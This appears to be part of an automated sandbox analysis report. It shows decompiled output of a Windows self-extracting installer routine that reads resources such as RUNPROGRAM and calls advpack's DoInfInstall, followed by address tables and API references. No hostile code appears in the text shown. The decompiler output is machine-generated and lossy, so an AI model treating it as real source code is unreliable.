                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0x1f9124 =  *0x1f9124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0x1f8a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0x1f8c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E001F468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E001F1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E001F6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E001F3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0x1f8580;
                                                                                                                                                                                                        													if( *0x1f8580 != 0) {
                                                                                                                                                                                                        														E001F2267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0x1f8180;
                                                                                                                                                                                                        											if( *0x1f8180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E001F44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0x1f9124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x1f9a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E001F6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E001F44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E001F44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x1f8a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0x1f9a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0x1f8a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0x1f9154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0x1f91e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0x1f8a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0x1f9a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0x1f8d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0x1f9a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0x1fa288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0x1f9124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0x1f9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0x1f8a20;
                                                                                                                                                                                                        										if( *0x1f8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E001F202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E001F468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x1f8c42;
                                                                                                                                                                                                        									if( *0x1f8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0x1f8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E001F468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E001F468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E001F1781( &_v276, 0x104, _t130, 0x1f8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E001F468F(_t130, 0x1f9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                        0x001f3baa
                                                                                                                                                                                                        0x001f3bb0
                                                                                                                                                                                                        0x001f3bb7
                                                                                                                                                                                                        0x001f3bc0
                                                                                                                                                                                                        0x001f3bc2
                                                                                                                                                                                                        0x001f3bc9
                                                                                                                                                                                                        0x001f3bcb
                                                                                                                                                                                                        0x001f3bcf
                                                                                                                                                                                                        0x001f3bd3
                                                                                                                                                                                                        0x001f3bd9
                                                                                                                                                                                                        0x001f3bfd
                                                                                                                                                                                                        0x001f3bfd
                                                                                                                                                                                                        0x001f3bff
                                                                                                                                                                                                        0x001f3c03
                                                                                                                                                                                                        0x001f3c03
                                                                                                                                                                                                        0x001f3c11
                                                                                                                                                                                                        0x001f3c16
                                                                                                                                                                                                        0x001f3c19
                                                                                                                                                                                                        0x001f3c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3c30
                                                                                                                                                                                                        0x001f3c39
                                                                                                                                                                                                        0x001f3c40
                                                                                                                                                                                                        0x001f3d13
                                                                                                                                                                                                        0x001f3d15
                                                                                                                                                                                                        0x001f3d21
                                                                                                                                                                                                        0x001f3d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3c4f
                                                                                                                                                                                                        0x001f3c56
                                                                                                                                                                                                        0x001f3c60
                                                                                                                                                                                                        0x001f3c65
                                                                                                                                                                                                        0x001f3c77
                                                                                                                                                                                                        0x001f3c78
                                                                                                                                                                                                        0x001f3c7c
                                                                                                                                                                                                        0x001f3c7e
                                                                                                                                                                                                        0x001f3c82
                                                                                                                                                                                                        0x001f3c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3c7c
                                                                                                                                                                                                        0x001f3c67
                                                                                                                                                                                                        0x001f3c69
                                                                                                                                                                                                        0x001f3c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3c58
                                                                                                                                                                                                        0x001f3c58
                                                                                                                                                                                                        0x001f3c6e
                                                                                                                                                                                                        0x001f3c6e
                                                                                                                                                                                                        0x001f3c87
                                                                                                                                                                                                        0x001f3c89
                                                                                                                                                                                                        0x001f3d4d
                                                                                                                                                                                                        0x001f3d4f
                                                                                                                                                                                                        0x001f3d50
                                                                                                                                                                                                        0x001f3d52
                                                                                                                                                                                                        0x001f3d9e
                                                                                                                                                                                                        0x001f3da8
                                                                                                                                                                                                        0x001f3daf
                                                                                                                                                                                                        0x001f3db4
                                                                                                                                                                                                        0x001f3db6
                                                                                                                                                                                                        0x001f3f4d
                                                                                                                                                                                                        0x001f3f4d
                                                                                                                                                                                                        0x001f3f4f
                                                                                                                                                                                                        0x001f3f56
                                                                                                                                                                                                        0x001f3f57
                                                                                                                                                                                                        0x001f3f58
                                                                                                                                                                                                        0x001f3f63
                                                                                                                                                                                                        0x001f3f63
                                                                                                                                                                                                        0x001f3dbc
                                                                                                                                                                                                        0x001f3dc0
                                                                                                                                                                                                        0x001f3dc2
                                                                                                                                                                                                        0x001f3de6
                                                                                                                                                                                                        0x001f3de6
                                                                                                                                                                                                        0x001f3de8
                                                                                                                                                                                                        0x001f3f0b
                                                                                                                                                                                                        0x001f3f0b
                                                                                                                                                                                                        0x001f3f0f
                                                                                                                                                                                                        0x001f3f13
                                                                                                                                                                                                        0x001f3f15
                                                                                                                                                                                                        0x001f3f1a
                                                                                                                                                                                                        0x001f3f1c
                                                                                                                                                                                                        0x001f3f46
                                                                                                                                                                                                        0x001f3f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f47
                                                                                                                                                                                                        0x001f3f1e
                                                                                                                                                                                                        0x001f3f1f
                                                                                                                                                                                                        0x001f3f25
                                                                                                                                                                                                        0x001f3f26
                                                                                                                                                                                                        0x001f3f2a
                                                                                                                                                                                                        0x001f3f2d
                                                                                                                                                                                                        0x001f3fd9
                                                                                                                                                                                                        0x001f3fd9
                                                                                                                                                                                                        0x001f3fda
                                                                                                                                                                                                        0x001f3fda
                                                                                                                                                                                                        0x001f3fe1
                                                                                                                                                                                                        0x001f3fe3
                                                                                                                                                                                                        0x001f3fe3
                                                                                                                                                                                                        0x001f3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3fe8
                                                                                                                                                                                                        0x001f3f33
                                                                                                                                                                                                        0x001f3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f37
                                                                                                                                                                                                        0x001f3dee
                                                                                                                                                                                                        0x001f3dee
                                                                                                                                                                                                        0x001f3df5
                                                                                                                                                                                                        0x001f3fad
                                                                                                                                                                                                        0x001f3fb9
                                                                                                                                                                                                        0x001f3fc2
                                                                                                                                                                                                        0x001f3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3fc8
                                                                                                                                                                                                        0x001f3dfb
                                                                                                                                                                                                        0x001f3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3e03
                                                                                                                                                                                                        0x001f3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3e15
                                                                                                                                                                                                        0x001f3e17
                                                                                                                                                                                                        0x001f3e19
                                                                                                                                                                                                        0x001f3f94
                                                                                                                                                                                                        0x001f3fa4
                                                                                                                                                                                                        0x001f3f7c
                                                                                                                                                                                                        0x001f3f80
                                                                                                                                                                                                        0x001f3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f8b
                                                                                                                                                                                                        0x001f3e2c
                                                                                                                                                                                                        0x001f3e30
                                                                                                                                                                                                        0x001f3e34
                                                                                                                                                                                                        0x001f3e36
                                                                                                                                                                                                        0x001f3f69
                                                                                                                                                                                                        0x001f3f6e
                                                                                                                                                                                                        0x001f3f70
                                                                                                                                                                                                        0x001f3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f76
                                                                                                                                                                                                        0x001f3e3c
                                                                                                                                                                                                        0x001f3e43
                                                                                                                                                                                                        0x001f3e47
                                                                                                                                                                                                        0x001f3e52
                                                                                                                                                                                                        0x001f3e56
                                                                                                                                                                                                        0x001f3e5c
                                                                                                                                                                                                        0x001f3e61
                                                                                                                                                                                                        0x001f3e68
                                                                                                                                                                                                        0x001f3e70
                                                                                                                                                                                                        0x001f3e74
                                                                                                                                                                                                        0x001f3e7c
                                                                                                                                                                                                        0x001f3e80
                                                                                                                                                                                                        0x001f3e82
                                                                                                                                                                                                        0x001f3e82
                                                                                                                                                                                                        0x001f3e87
                                                                                                                                                                                                        0x001f3e87
                                                                                                                                                                                                        0x001f3e8b
                                                                                                                                                                                                        0x001f3e91
                                                                                                                                                                                                        0x001f3e94
                                                                                                                                                                                                        0x001f3e96
                                                                                                                                                                                                        0x001f3e96
                                                                                                                                                                                                        0x001f3e9b
                                                                                                                                                                                                        0x001f3e9b
                                                                                                                                                                                                        0x001f3e9f
                                                                                                                                                                                                        0x001f3ea2
                                                                                                                                                                                                        0x001f3ea4
                                                                                                                                                                                                        0x001f3ea4
                                                                                                                                                                                                        0x001f3ea9
                                                                                                                                                                                                        0x001f3ea9
                                                                                                                                                                                                        0x001f3ead
                                                                                                                                                                                                        0x001f3eb3
                                                                                                                                                                                                        0x001f3eb6
                                                                                                                                                                                                        0x001f3eb8
                                                                                                                                                                                                        0x001f3eb8
                                                                                                                                                                                                        0x001f3ebd
                                                                                                                                                                                                        0x001f3ebd
                                                                                                                                                                                                        0x001f3ec1
                                                                                                                                                                                                        0x001f3ec3
                                                                                                                                                                                                        0x001f3ec5
                                                                                                                                                                                                        0x001f3ec5
                                                                                                                                                                                                        0x001f3eca
                                                                                                                                                                                                        0x001f3eca
                                                                                                                                                                                                        0x001f3ece
                                                                                                                                                                                                        0x001f3ed5
                                                                                                                                                                                                        0x001f3ed9
                                                                                                                                                                                                        0x001f3ee0
                                                                                                                                                                                                        0x001f3ee6
                                                                                                                                                                                                        0x001f3eea
                                                                                                                                                                                                        0x001f3eec
                                                                                                                                                                                                        0x001f3eee
                                                                                                                                                                                                        0x001f3ef3
                                                                                                                                                                                                        0x001f3ef3
                                                                                                                                                                                                        0x001f3ef5
                                                                                                                                                                                                        0x001f3efa
                                                                                                                                                                                                        0x001f3efb
                                                                                                                                                                                                        0x001f3efd
                                                                                                                                                                                                        0x001f3f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3eff
                                                                                                                                                                                                        0x001f3eff
                                                                                                                                                                                                        0x001f3f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3f05
                                                                                                                                                                                                        0x001f3efd
                                                                                                                                                                                                        0x001f3dc7
                                                                                                                                                                                                        0x001f3dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3dd0
                                                                                                                                                                                                        0x001f3dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3dd9
                                                                                                                                                                                                        0x001f3ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3ddd
                                                                                                                                                                                                        0x001f3de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3de1
                                                                                                                                                                                                        0x001f3d59
                                                                                                                                                                                                        0x001f3d65
                                                                                                                                                                                                        0x001f3d6a
                                                                                                                                                                                                        0x001f3d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3d6e
                                                                                                                                                                                                        0x001f3d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3d8f
                                                                                                                                                                                                        0x001f3d96
                                                                                                                                                                                                        0x001f3d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3d98
                                                                                                                                                                                                        0x001f3c8f
                                                                                                                                                                                                        0x001f3c98
                                                                                                                                                                                                        0x001f3cf1
                                                                                                                                                                                                        0x001f3cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3cfe
                                                                                                                                                                                                        0x001f3d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3d11
                                                                                                                                                                                                        0x001f3c9c
                                                                                                                                                                                                        0x001f3ca5
                                                                                                                                                                                                        0x001f3ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3cad
                                                                                                                                                                                                        0x001f3cb2
                                                                                                                                                                                                        0x001f3cb7
                                                                                                                                                                                                        0x001f3cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3ce8
                                                                                                                                                                                                        0x001f3cec
                                                                                                                                                                                                        0x001f3ced
                                                                                                                                                                                                        0x001f3ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3ce8
                                                                                                                                                                                                        0x001f3c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3c9e
                                                                                                                                                                                                        0x001f3c56
                                                                                                                                                                                                        0x001f3d35
                                                                                                                                                                                                        0x001f3d35
                                                                                                                                                                                                        0x001f3d3c
                                                                                                                                                                                                        0x001f3d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3d48
                                                                                                                                                                                                        0x001f3c03
                                                                                                                                                                                                        0x001f3be2
                                                                                                                                                                                                        0x001f3be7
                                                                                                                                                                                                        0x001f3bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 001F3CDC
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,001F8C42), ref: 001F3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 001F3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,001F8C42), ref: 001F3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,001F8C42), ref: 001F3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,001F8C42), ref: 001F3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,001F8C42), ref: 001F3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,001F8C42), ref: 001F3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,001F8C42), ref: 001F3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,001F8C42), ref: 001F3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
